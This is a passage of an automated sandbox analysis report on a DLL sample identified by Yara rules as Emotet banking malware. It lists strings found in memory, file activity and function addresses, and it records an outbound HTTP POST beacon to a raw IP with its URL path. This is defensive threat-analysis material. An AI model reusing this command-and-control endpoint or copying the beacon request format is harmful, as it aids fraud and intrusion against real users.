sionId":"2022-07-22T07:55:01.8237416Z\|\|.\|\|b7e2ac48-308b-4ab0-ad70-c01dd95863e0\|\|1152921505695074449\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: svchost.exe, 00000005.00000002.678223626.000001EE1C466000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.771526446.0000029548DE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.633814471.000001B27DF06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.619778397.000001B27DF05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.619719368.000001B27DF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DataStore.edb.13.dr	String found in binary or memory: http://crl.m
Source: sample.dll	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000005.00000002.678223626.000001EE1C466000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.770223866.00000295439CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: sample.dll	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/crup/2019/01/windows10.0-kb4023057-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2019/06/am_base_c14780cb9d5b4186
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2019/06/am_base_f13cce5fe6d5899e
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2019/06/am_delta_1d89462b9fd63f7
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2019/06/am_delta_2515cac5324726b
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2019/06/am_engine_4a6bfe9bdf9610
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103729-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/09/windows10.0-kb4457146-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/11/windows10.0-kb4467694-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/02/windows10.0-kb4487038-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/03/windows10.0-kb4489907-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/04/windows10.0-kb4493478-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows10.0-kb4497932-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/06/windows10.0-kb4503308-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/updt/2018/10/windows10.0-kb4462930-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/updt/2019/02/windows10.0-kb4023057-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/updt/2019/02/windows10.0-kb4346084-v3
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/updt/2019/03/windows10.0-kb4480730-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/updt/2019/06/windows10.0-kb4023057-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/uprl/2019/03/windows-kb890830-x64-v5.
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/crup/2018/11/windows10.0-kb4023057-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/12/mpsigstub_e2cf99f9fe2435
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2019/05/am_engine_4bd807c2ad329f
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2019/06/am_delta_26592077dcd864e
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2019/06/am_delta_71582bbecccb8ef
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2019/06/am_delta_7500d7907ca7757
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2019/06/am_delta_830990588e5a078
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/06/windows10.0-kb4287903-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/06/windows10.0-kb4338832-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/08/windows10.0-kb4343902-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/11/windows10.0-kb4477029-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/12/windows10.0-kb4471331-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/01/windows10.0-kb4480979-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/updt/2018/09/windows10.0-kb4100347-v3
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/updt/2018/10/windows10.0-kb4100347-v4
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/updt/2019/02/windows10.0-kb4023057-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/updt/2019/03/windows10.0-kb4023057-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/updt/2019/05/windows10.0-kb4023057-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/updt/2019/05/windows10.0-kb4480730-x6
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/uprl/2019/04/windows-kb890830-x64-v5.
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/uprl/2019/05/windows-kb890830-x64-v5.
Source: DataStore.edb.13.dr	String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/uprl/2019/06/windows-kb890830-x64-v5.
Source: sample.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: svchost.exe, 0000000B.00000002.363203777.000001E26E213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	String found in binary or memory: http://www.windowsphone.com/
Source: svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	String found in binary or memory: http://www.xbox.com/
Source: svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.362958279.000001E26E25A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.363247965.000001E26E24E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362936248.000001E26E248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362989402.000001E26E241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363241068.000001E26E242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362989402.000001E26E241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363241068.000001E26E242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363256486.000001E26E25D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362944843.000001E26E25C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.362958279.000001E26E25A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000002.363256486.000001E26E25D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362944843.000001E26E25C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000002.363256486.000001E26E25D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362944843.000001E26E25C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000002.363263870.000001E26E264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363241068.000001E26E242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.341135545.000001E26E232000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	String found in binary or memory: https://live.xbox.com/purchase/xbox/
Source: svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	String found in binary or memory: https://login.windows.net/common
Source: svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	String found in binary or memory: https://profile.xboxlive.com/users/batch/profile/settings
Source: sample.dll	String found in binary or memory: https://sectigo.com/CPS0D
Source: svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr	String found in binary or memory: https://storeedgefd.dsx.mp.micr
Source: svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363203777.000001E26E213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362985130.000001E26E245000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362985130.000001E26E245000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.341135545.000001E26E232000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000003.341135545.000001E26E232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363234025.000001E26E23B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.363247965.000001E26E24E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362936248.000001E26E248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Source: unknown

HTTP traffic detected: POST /mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/ HTTP/1.1DNT: 0Referer: 157.245.145.87/mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/Content-Type: multipart/form-data; boundary=-----------------------mlpYKhZmEPpzkygQscIgNsfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 157.245.145.87:443Content-Length: 5636Connection: Keep-AliveCache-Control: no-cache

Source: loaddll32.exe, 00000000.00000002.341930535.00000000009EB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 8.2.rundll32.exe.2e20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.4760000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.10000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.580000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.580000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.10000000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.a10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.5a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.4760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.a10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.5a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.335758052.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.767352719.0000000004760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.332283199.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.331704119.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.331683572.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.341884681.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.335476233.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.332269283.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.332361997.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.766565506.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.767779490.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337892892.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.341860463.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.331772344.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.360786510.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.360804490.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.360909118.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: sample.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 344

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Ttwabgporcdt\yyxjoravwnz.pba:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Ttwabgporcdt\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001A0F1	0_2_1001A0F1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10012C05	0_2_10012C05
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001806	0_2_10001806
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002208	0_2_10002208
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000240F	0_2_1000240F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000E612	0_2_1000E612
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10006417	0_2_10006417
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10005418	0_2_10005418
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000A821	0_2_1000A821
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10010223	0_2_10010223
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10018C2B	0_2_10018C2B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001D02D	0_2_1001D02D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10012631	0_2_10012631
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10018A33	0_2_10018A33
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10014C37	0_2_10014C37
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10004844	0_2_10004844
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000E044	0_2_1000E044
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10015250	0_2_10015250
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10010672	0_2_10010672
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000BE74	0_2_1000BE74
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001AA7B	0_2_1001AA7B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000327F	0_2_1000327F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000DE81	0_2_1000DE81
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10011090	0_2_10011090
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10014A9E	0_2_10014A9E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000CAA3	0_2_1000CAA3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000A6C9	0_2_1000A6C9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000A2D2	0_2_1000A2D2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001C6D9	0_2_1001C6D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000D2DD	0_2_1000D2DD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001D4E1	0_2_1001D4E1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000D6F0	0_2_1000D6F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000ECFE	0_2_1000ECFE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10005F04	0_2_10005F04
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10014F04	0_2_10014F04
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10009106	0_2_10009106
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001D70B	0_2_1001D70B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000A525	0_2_1000A525
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10009D2F	0_2_10009D2F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001CF31	0_2_1001CF31
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10007731	0_2_10007731
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003336	0_2_10003336
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003938	0_2_10003938
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10007B39	0_2_10007B39
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000C145	0_2_1000C145
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10019B4A	0_2_10019B4A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10013F4F	0_2_10013F4F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001434E	0_2_1001434E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001135B	0_2_1001135B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000C364	0_2_1000C364
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001B165	0_2_1001B165
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001A966	0_2_1001A966
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000F369	0_2_1000F369
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B74	0_2_10003B74
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10007378	0_2_10007378
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10005B7D	0_2_10005B7D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10017187	0_2_10017187
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10011F88	0_2_10011F88
